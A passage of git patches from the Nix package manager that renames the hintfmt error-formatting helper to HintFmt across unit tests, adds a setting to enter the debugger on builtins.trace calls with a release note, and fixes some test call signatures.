Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the addition")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the addition")); } @@ -932,13 +933,13 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the subtraction")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the subtraction")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the subtraction")); } @@ -946,13 +947,13 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument of the multiplication")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument of the multiplication")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument of the multiplication")); } @@ -960,17 +961,17 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first operand of the division")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second operand of the division")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", EvalError, - hintfmt("division by zero")); + HintFmt("division by zero")); } @@ -978,13 +979,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.bitAnd")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitAnd")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -992,13 +993,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.bitOr")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitOr")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1006,13 +1007,13 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "1.1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.bitXor")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "1.1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.bitXor")); ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("expected an integer but found %s: %s", "a float", normaltxt(ANSI_CYAN "2.2" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.bitXor")); + HintFmt("expected an integer but found %s: %s", "a float", Uncolored(ANSI_CYAN "2.2" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1020,16 +1021,16 @@ namespace nix { TEST_F(ErrorTraceTest, lessThan) { ASSERT_TRACE1("lessThan 1 \"foo\"", EvalError, - hintfmt("cannot compare %s with %s", "an integer", "a string")); + HintFmt("cannot compare %s with %s", "an integer", "a string")); ASSERT_TRACE1("lessThan {} {}", EvalError, - hintfmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); + HintFmt("cannot compare %s with %s; values of that type are incomparable", "a set", "a set")); ASSERT_TRACE2("lessThan [ 1 2 ] [ \"foo\" ]", EvalError, - hintfmt("cannot compare %s with %s", "an integer", "a string"), - hintfmt("while comparing two list elements")); + HintFmt("cannot compare %s with %s", "an integer", "a string"), + HintFmt("while comparing two list elements")); } @@ -1037,8 +1038,8 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), - hintfmt("while evaluating the first argument passed to builtins.toString")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }")), + HintFmt("while evaluating the first argument passed to builtins.toString")); } @@ -1046,22 +1047,22 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the first argument (the start offset) passed to builtins.substring")); + HintFmt("expected an integer but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the first argument (the start offset) passed to builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); + HintFmt("expected an integer but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", EvalError, - hintfmt("negative start position in 'substring'")); + HintFmt("negative start position in 'substring'")); } @@ -1069,8 +1070,8 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the argument passed to builtins.stringLength")); + HintFmt("cannot coerce %s to a string: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1078,17 +1079,17 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.hashString")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", UsageError, - hintfmt("unknown hash algorithm '%s', expect 'md5', 'sha1', 'sha256', or 'sha512'", "foo")); + HintFmt("unknown hash algorithm '%s', expect 'md5', 'sha1', 'sha256', or 'sha512'", "foo")); ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.hashString")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1096,17 +1097,17 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.match")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.match")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.match")); ASSERT_TRACE1("match \"(.*\" \"\"", EvalError, - hintfmt("invalid regular expression '%s'", "(.*")); + HintFmt("invalid regular expression '%s'", "(.*")); } @@ -1114,17 +1115,17 @@ namespace nix { TEST_F(ErrorTraceTest, split) { ASSERT_TRACE2("split 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.split")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.split")); ASSERT_TRACE2("split \"foo\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.split")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.split")); ASSERT_TRACE1("split \"f(o*o\" \"1foo2\"", EvalError, - hintfmt("invalid regular expression '%s'", "f(o*o")); + HintFmt("invalid regular expression '%s'", "f(o*o")); } @@ -1132,18 +1133,18 @@ namespace nix { TEST_F(ErrorTraceTest, concatStringsSep) { ASSERT_TRACE2("concatStringsSep 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument (the separator string) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); + HintFmt("expected a list but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument (the list of strings to concat) passed to builtins.concatStringsSep")); ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); + HintFmt("cannot coerce %s to a string: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1151,8 +1152,8 @@ namespace nix { TEST_F(ErrorTraceTest, parseDrvName) { ASSERT_TRACE2("parseDrvName 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.parseDrvName")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.parseDrvName")); } @@ -1160,13 +1161,13 @@ namespace nix { TEST_F(ErrorTraceTest, compareVersions) { ASSERT_TRACE2("compareVersions 1 {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.compareVersions")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.compareVersions")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1174,8 +1175,8 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.splitVersion")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.splitVersion")); } @@ -1188,108 +1189,108 @@ namespace nix { TEST_F(ErrorTraceTest, derivationStrict) { ASSERT_TRACE2("derivationStrict \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", "\"\""), - hintfmt("while evaluating the argument passed to builtins.derivationStrict")); + HintFmt("expected a set but found %s: %s", "a string", "\"\""), + HintFmt("while evaluating the argument passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict {}", TypeError, - hintfmt("attribute '%s' missing", "name"), - hintfmt("in the attrset passed as argument to builtins.derivationStrict")); + HintFmt("attribute '%s' missing", "name"), + HintFmt("in the attrset passed as argument to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = 1; }", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", "1"), - hintfmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); + HintFmt("expected a string but found %s: %s", "an integer", "1"), + HintFmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; }", TypeError, - hintfmt("required attribute 'builder' missing"), - hintfmt("while evaluating derivation 'foo'")); + HintFmt("required attribute 'builder' missing"), + HintFmt("while evaluating derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __structuredAttrs = 15; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), - hintfmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); + HintFmt("expected a Boolean but found %s: %s", "an integer", "15"), + HintFmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __ignoreNulls = 15; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), - hintfmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); + HintFmt("expected a Boolean but found %s: %s", "an integer", "15"), + HintFmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = 15; }", TypeError, - hintfmt("invalid value '15' for 'outputHashMode' attribute"), - hintfmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); + HintFmt("invalid value '15' for 'outputHashMode' attribute"), + HintFmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = \"custom\"; }", TypeError, - hintfmt("invalid value 'custom' for 'outputHashMode' attribute"), - hintfmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); + HintFmt("invalid value 'custom' for 'outputHashMode' attribute"), + HintFmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", TypeError, - hintfmt("invalid derivation output name 'drv'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("invalid derivation output name 'drv'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = []; }", TypeError, - hintfmt("derivation cannot have an empty set of outputs"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("derivation cannot have an empty set of outputs"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = [ \"drv\" ]; }", TypeError, - hintfmt("invalid derivation output name 'drv'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("invalid derivation output name 'drv'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = [ \"out\" \"out\" ]; }", TypeError, - hintfmt("duplicate derivation output 'out'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("duplicate derivation output 'out'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __contentAddressed = \"true\"; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = \"foo\"; }", TypeError, - hintfmt("expected a list but found %s: %s", "a string", "\"foo\""), - hintfmt("while evaluating the attribute 'args' of derivation 'foo'")); + HintFmt("expected a list but found %s: %s", "a string", "\"foo\""), + HintFmt("while evaluating the attribute 'args' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating an element of the argument list")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating an element of the argument list")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } */ diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index c8c7c091f..1d7304f05 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -42,7 +42,7 @@ namespace nix { makeJSONLogger(*logger)->logEI({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foFile, problem_file, 02, 13) @@ -62,7 +62,7 @@ namespace nix { throw TestError(e.info()); } catch (Error &e) { ErrorInfo ei = e.info(); - ei.msg = hintfmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); + ei.msg = HintFmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); testing::internal::CaptureStderr(); logger->logEI(ei); @@ -176,7 +176,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foString, problem_file, 02, 13), @@ -193,7 +193,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foFile, problem_file, 02, 13) @@ -208,7 +208,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("hint %1%", "only"), + .msg = HintFmt("hint %1%", "only"), }); auto str = testing::internal::GetCapturedStderr(); @@ -225,7 +225,7 @@ namespace nix { logWarning({ .name = "name", - .msg = hintfmt("there was a %1%", "warning"), + .msg = HintFmt("there was a %1%", "warning"), }); auto str = testing::internal::GetCapturedStderr(); @@ -241,7 +241,7 @@ namespace nix { logWarning({ .name = "warning name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foStdin, problem_file, 2, 13), @@ -264,7 +264,7 @@ namespace nix { auto e = AssertionError(ErrorInfo { .name = "wat", - .msg = hintfmt("it has been %1% days since our last error", "zero"), + .msg = HintFmt("it has been %1% days since our last error", "zero"), .errPos = Pos(foString, problem_file, 2, 13), }); @@ -290,7 +290,7 @@ namespace nix { auto e = AssertionError(ErrorInfo { .name = "wat", - .msg = hintfmt("it has been %1% days since our last error", "zero"), + .msg = HintFmt("it has been %1% days since our last error", "zero"), .errPos = Pos(foString, problem_file, 2, 13), }); @@ -310,39 +310,39 @@ namespace nix { /* ---------------------------------------------------------------------------- - * hintfmt + * HintFmt * --------------------------------------------------------------------------*/ - TEST(hintfmt, percentStringWithoutArgs) { + TEST(HintFmt, percentStringWithoutArgs) { const char *teststr = "this is 100%s correct!"; ASSERT_STREQ( - hintfmt(teststr).str().c_str(), + HintFmt(teststr).str().c_str(), teststr); } - TEST(hintfmt, fmtToHintfmt) { + TEST(HintFmt, fmtToHintfmt) { ASSERT_STREQ( - hintfmt(fmt("the color of this this text is %1%", "not yellow")).str().c_str(), + HintFmt(fmt("the color of this this text is %1%", "not yellow")).str().c_str(), "the color of this this text is not yellow"); } - TEST(hintfmt, tooFewArguments) { + TEST(HintFmt, tooFewArguments) { ASSERT_STREQ( - hintfmt("only one arg %1% %2%", "fulfilled").str().c_str(), + HintFmt("only one arg %1% %2%", "fulfilled").str().c_str(), "only one arg " ANSI_WARNING "fulfilled" ANSI_NORMAL " "); } - TEST(hintfmt, tooManyArguments) { + TEST(HintFmt, tooManyArguments) { ASSERT_STREQ( - hintfmt("what about this %1% %2%", "%3%", "one", "two").str().c_str(), + HintFmt("what about this %1% %2%", "%3%", "one", "two").str().c_str(), "what about this " ANSI_WARNING "%3%" ANSI_NORMAL " " ANSI_YELLOW "one" ANSI_NORMAL); } From 8b7eb7400b166b1c2ef45a6d66999041f33c40bf Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:41:34 -0800 Subject: [PATCH 428/654] Enter debugger on `builtins.trace` with an option --- src/libexpr/eval-settings.hh | 3 +++ src/libexpr/primops.cc | 4 ++++ 2 files changed, 7 insertions(+) diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index 2f6c12d45..757daebc0 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -127,6 +127,9 @@ struct EvalSettings : Config Setting maxCallDepth{this, 10000, "max-call-depth", "The maximum function call depth to allow before erroring."}; + + Setting builtinsTraceDebugger{this, false, "builtins-trace-debugger", + "Whether to enter the debugger on `builtins.trace` calls."}; }; extern EvalSettings evalSettings; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5e2bbe16f..a24a2d018 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -995,6 +995,10 @@ static void prim_trace(EvalState & state, const PosIdx pos, Value * * args, Valu printError("trace: %1%", args[0]->string_view()); else printError("trace: %1%", ValuePrinter(state, *args[0])); + if (evalSettings.builtinsTraceDebugger && state.debugRepl && !state.debugTraces.empty()) { + const DebugTrace & last = state.debugTraces.front(); + state.runDebugRepl(nullptr, last.env, last.expr); + } state.forceValue(*args[1], pos); v = *args[1]; } From 4440eb54e7274734ec442081f55023853efa8708 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:03:08 -0800 Subject: [PATCH 429/654] Add release note --- doc/manual/rl-next/debugger-on-trace.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/debugger-on-trace.md diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md new file mode 100644 index 000000000..d4e55d59c --- /dev/null +++ b/doc/manual/rl-next/debugger-on-trace.md @@ -0,0 +1,9 @@ +--- +synopsis: Enter the `--debugger` when `builtins.trace` is called if `builtins-trace-debugger` is set +prs: 9914 +--- + +If the `builtins-trace-debugger` option is set and `--debugger` is given, +`builtins.trace` calls will behave similarly to `builtins.break` and will enter +the debug REPL. This is useful for determining where warnings are being emitted +from. From 953eb0cba2aad89753a39da6c98d409d1b88f88e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 15:55:20 -0800 Subject: [PATCH 430/654] Fix tests --- tests/unit/libexpr/error_traces.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index a899d3113..7b32b320b 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -26,7 +26,7 @@ namespace nix { try { state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (Error & e) { - e.addTrace(state.positions[noPos], "beans", ""); + e.addTrace(state.positions[noPos], "beans"); throw; } } catch (BaseError & e) { @@ -52,7 +52,7 @@ namespace nix { try { state.error("beans").debugThrow(); } catch (Error & e2) { - e.addTrace(state.positions[noPos], "beans2", ""); + e.addTrace(state.positions[noPos], "beans2"); //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); @@ -807,7 +807,7 @@ namespace nix { ASSERT_TRACE2("genList 1 2", TypeError, HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), - HintFmt("while evaluating the first argument passed to builtins.genList", "an integer")); + HintFmt("while evaluating the first argument passed to builtins.genList")); // XXX: defered // ASSERT_TRACE2("genList (x: x + \"foo\") 2 #TODO", From 